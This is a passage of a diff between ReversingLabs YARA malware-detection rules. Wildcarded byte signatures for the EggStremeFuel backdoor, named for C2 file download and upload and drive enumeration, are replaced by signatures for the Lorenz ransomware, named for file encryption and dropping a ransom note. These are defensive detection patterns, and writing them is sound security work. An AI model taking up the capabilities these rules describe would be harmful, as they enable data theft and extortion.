+            66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89
+            44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D
+            ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
+            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
         }
-		$decrypt_embedded_library_1 = {
-            41 57 41 56 41 55 41 54 55 48 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 8B 77 ?? 48
-            8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 39 45 ?? 0F
-            84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
-            4C 89 E7 E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E2 48 89 C7 48
-            89 44 24 ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 39 84
-            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8D BC
-            24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0 ?? 48 83 C2 ?? 48 89 84 24 ?? ?? ??
-            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8B 23 48 89 94 24 ?? ?? ?? ??
-            4C 89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 63 ?? 4C
-            89 E7 E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 4C 89 E6 E8 ?? ?? ?? ?? 48 8B 5B ?? 48 89
-            DF E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 C2 48 89 DE E8 ?? ?? ?? ?? 49 8D 7F ?? 48 89 EE
-            E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 4C 89 FE 48 C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 DF 48 C7 84 24 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE
-            48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ??
-            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89
-            C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 C7 48 89 44 24 ?? E8
+		$encrypt_files_p1 = {
+            B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75
+            ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48
+            85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D
+            ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89
+            00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19
+            48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ??
+            ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ??
+            ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ??
+            ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45
         }
-		$decrypt_embedded_library_2 = {
-            48 8D 7C 24 ?? 49 89 F9 0F 1F 84 00 ?? ?? ?? ?? 89 CA 89 C8 83 C1 ?? C1 FA ?? F7 FB
-            48 63 D2 0F B6 04 16 41 88 01 49 83 C1 ?? 81 F9 ?? ?? ?? ?? 75 ?? 48 8D B5 ?? ?? ??
-            ?? 48 89 E8 31 D2 66 90 0F B6 18 44 0F B6 0F 48 83 C7 ?? 0F B6 CB 41 8D 0C 09 8D 14
-            11 41 89 D3 41 C1 FB ?? 41 C1 EB ?? 44 01 DA 81 E2 ?? ?? ?? ?? 44 29 DA 48 63 CA 83
-            C2 ?? 44 0F B6 8C 0C ?? ?? ?? ?? 44 88 08 48 83 C0 ?? 88 9C 0C ?? ?? ?? ?? 48 39 F0
-            75 ?? 4D 29 C2 45 85 D2 0F 8E ?? ?? ?? ?? 41 83 EA ?? 31 C0 31 D2 4F 8D 54 10 ?? 66
-            0F 1F 84 00 ?? ?? 00 00 83 C2 ?? 89 D1 C1 F9 ?? C1 E9 ?? 01 CA 81 E2 ?? ?? ?? ?? 29
-            CA 48 63 CA 83 C2 ?? 0F B6 BC 0C ?? ?? ?? ?? 40 0F B6 DF 8D 04 03 89 C6 C1 FE ?? C1
-            EE ?? 01 F0 25 ?? ?? ?? ?? 29 F0 48 63 F0 83 C0 ?? 44 0F B6 8C 34 ?? ?? ?? ?? 44 88
-            8C 0C ?? ?? ?? ?? 40 88 BC 34 ?? ?? ?? ?? 02 9C 0C ?? ?? ?? ?? 0F B6 DB 0F B6 8C 1C
-            ?? ?? ?? ?? 41 30 08 49 83 C0 ?? 4D 39 D0 75 ?? B9 ?? ?? ?? ?? 31 C0 48 89 EF F3 48
-            AB 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48
-            8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48
-            8B 84 24 ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 74 ?? 48 8B BC 24 ?? ?? ?? ??
-            48 85 FF 74 ?? E8 ?? ?? ?? ?? 4C 89 FF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ??
-            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$encrypt_files_p2 = {
+            33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B
+            15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44
+            24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48
+            8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ??
+            0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44
+            8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE
+            FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF
+            15 ?? ?? ?? ?? 4D 85 F6
         }
-		$remove_backdoor_p1 = {
-            41 57 48 8D 35 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24
-            ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ??
-            48 89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
-            89 C6 48 89 D7 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ??
-            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 8B 35 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89
-            EF 49 8D 76 ?? E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ??
-            ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 89 DF
-            E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 49
-            8D 76 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ??
-            ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 89 DE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
-            E6 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24
+		$drop_ransom_note = {
+            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
+            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
+            ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83
+            C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89
+            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ??
+            ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0
+            46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 48 8B CB FF 15 ?? ??
+            ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95
+            ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
+            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48
+            8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ??
+            ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48
+            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15
         }
-		$remove_backdoor_p2 = {
-            45 31 FF 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ??
-            ?? 48 8D 35 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8D 94 24
-            ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 89
-            E2 48 89 C6 4C 89 EF E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
-            48 89 EF E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 8B 06 85 C0 0F 84
-            ?? ?? ?? ?? 48 8D 5C 24 ?? 31 C0 B9 ?? ?? ?? ?? 45 85 FF 48 89 DF F3 48 AB 0F 85 ??
-            ?? ?? ?? 44 8B 7C 24 ?? 45 85 FF 74 ?? 31 C0 B9 ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 54
-            24 ?? 48 8D 35 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 EF
-            E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ??
-            E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$enum_drives = {
+            48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F
+            83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66
+            C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1
+            48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
+            77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B
+            ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $load_embedded_library ) and ( all of ( $decrypt_embedded_library_* ) ) and ( all of ( $remove_backdoor_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $enum_drives ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-rule REVERSINGLABS_Win64_Backdoor_Eggstremefuel : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects EggStremeFuel backdoor."
+		description = "Yara rule that detects Lorenz ransomware."
 		author = "ReversingLabs"
-		id = "ec9d0294-042c-513e-9b7e-1cb9ca812f09"
-		date = "2025-11-03"
-		modified = "2025-11-03"
+		id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81"
+		date = "2022-10-24"
+		modified = "2022-10-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.EggStremeFuel.yara#L1-L144"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c229cc4357353a8bc1305389e0b4146558ef449498eeb3a9dc118b82895d6e80"
+		logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "EggStremeFuel"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Lorenz"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$download_file_from_c2 = {
-            48 89 5C 24 ?? 55 56 57 48 8D AC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 2B
-            E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 0F 10 02 48 8D 44 24 ?? 48 8B
-            F9 0F 10 4A ?? B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 0F 11 00 0F 10 42 ?? 0F 11 48 ?? 0F
-            10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F 11 48 ?? 0F 10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F
-            11 48 ?? 0F 11 40 ?? 48 03 C1 0F 10 42 ?? 48 03 D1 48 8D 8D ?? ?? ?? ?? 0F 11 40 ??
-            0F 10 0A 0F 10 42 ?? 0F 11 08 0F 10 4A ?? 0F 11 40 ?? 0F 10 42 ?? 0F 11 48 ?? 0F 10
-            4A ?? 33 D2 0F 11 40 ?? 0F 11 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C1 E8 ?? 85 C0
-            75 ?? 48 8D 44 24 ?? 49 83 C8 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 45 33 C9 48 8D 54 24
-            ?? E9 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 49 83 C8 ?? 49 FF C0
-            42 80 3C 00 ?? 75 ?? 41 B9 ?? ?? ?? ?? EB ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 95 ?? ?? ?? ?? 48 8B 8F ?? ?? ?? ?? 45 33 C9 FF 15
-            ?? ?? ?? ?? 44 8B 44 24 ?? 8B D8 41 3B C0 7D ?? 48 63 CB 48 8D 95 ?? ?? ?? ?? 48 03
-            D1 44 2B C3 48 8B 8F ?? ?? ?? ?? 45 33 C9 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 FF
-            15 ?? ?? ?? ?? 85 F6 7F ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 44 8B 44
-            24 ?? 03 DE 41 3B D8 7C ?? 44 89 44 24 ?? 48 8D 97 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C
-            8D 8D ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 95 ?? ?? ?? ?? 41
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
-        }
-		$upload_file_to_c2 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 55 57 41 56 48 8D AC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 2B E0 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B 3D ??
-            ?? ?? ?? 45 8B F0 48 8B F2 48 8B 4F ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ??
-            ?? ?? 48 8B CE E8 ?? ?? ?? ?? 48 89 47 ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ??
-            33 D2 48 8D 4C 24 ?? 8B D8 44 8D 42 ?? E8 ?? ?? ?? ?? 44 8B C3 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 C8 ?? 48 FF C0 80 3C 01 ?? 75 ??
-            4C 8B C8 4C 8D 44 24 ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 C6 44 24 ?? ?? 33 D2 48
-            89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 4D ?? 66 89 44 24 ?? 88 44 24 ??
-            E8 ?? ?? ?? ?? 33 D2 48 8B CB 44 8D 42 ?? E8 ?? ?? ?? ?? 48 8B 4F ?? E8 ?? ?? ?? ??
-            44 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4F ?? 45 33 C0 41
-            8B D6 E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 C8 ?? 48 FF C0 80 3C 01 ?? 75 ?? 89 44 24
-            ?? 45 33 C9 48 8D 44 24 ?? 4C 8B C6 48 89 44 24 ?? 45 8D 71 ?? 41 8B D6 E8 ?? ?? ??
-            ?? EB ?? 4C 8B 4F ?? 48 8D 4D ?? BA ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? 48 8B D8 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 4C 8D 45 ?? 48 83 64 24 ?? ??
-            44 8B CB 41 8B D6 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 4F ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 4C 8B C6 41 8B D6 83 64 24 ?? ??
-            48 83 64 24 ?? ?? E8 ?? ?? ?? ?? 48 8B 4F ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 48 8B 8D
-            ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ??
-            49 8B E3 41 5E 5F 5D C3
+		$encrypt_files_v1_p1 = {
+            BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A
+            ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75
+            ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ??
+            FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
+            0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D
+            ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50
         }
-		$get_logical_drive_data_p1 = {
-            48 8B C4 55 57 41 54 41 56 41 57 48 8D A8 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 C7 44
-            24 ?? ?? ?? ?? ?? 48 89 58 ?? 48 89 70 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ??
-            ?? ?? ?? 48 8B F9 33 D2 41 B8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 33 C0 48 89 45 ?? 88 45 ?? 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 63 D8 48 8B CB E8
-            ?? ?? ?? ?? 48 8B F0 48 8B D0 8B CB FF 15 ?? ?? ?? ?? 45 33 E4 41 BE ?? ?? ?? ?? 45
-            8B C6 33 D2 48 8D 4D ?? E8 ?? ?? ?? ?? 45 8B C6 33 D2 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B C3 99 83 E2 ?? 03 C2 C1 F8 ?? 85 C0 0F 8E ?? ?? ?? ?? 33 DB C6 44 24 ?? ??
-            4C 8B F6 44 8B F8 8A 04 33 88 44 24 ?? 49 8B CE FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 80
-            7F ?? ?? 75 ?? 0F B7 44 24 ?? 66 89 47 ?? C6 47 ?? ?? C6 47 ?? ?? 48 8D 15 ?? ?? ??
-            ?? EB ?? 83 F8 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 44 0F BE 04 33 48 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 66 89 45 ?? 8A
-            45 ?? 88 45 ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 4C 8B 4C 24 ?? 49 C1 E9 ?? 4C 8B 44 24 ?? 49 C1 E8 ?? 48 8D 15 ??
-            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? 48 83 64 24 ?? ?? C6 44 24 ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
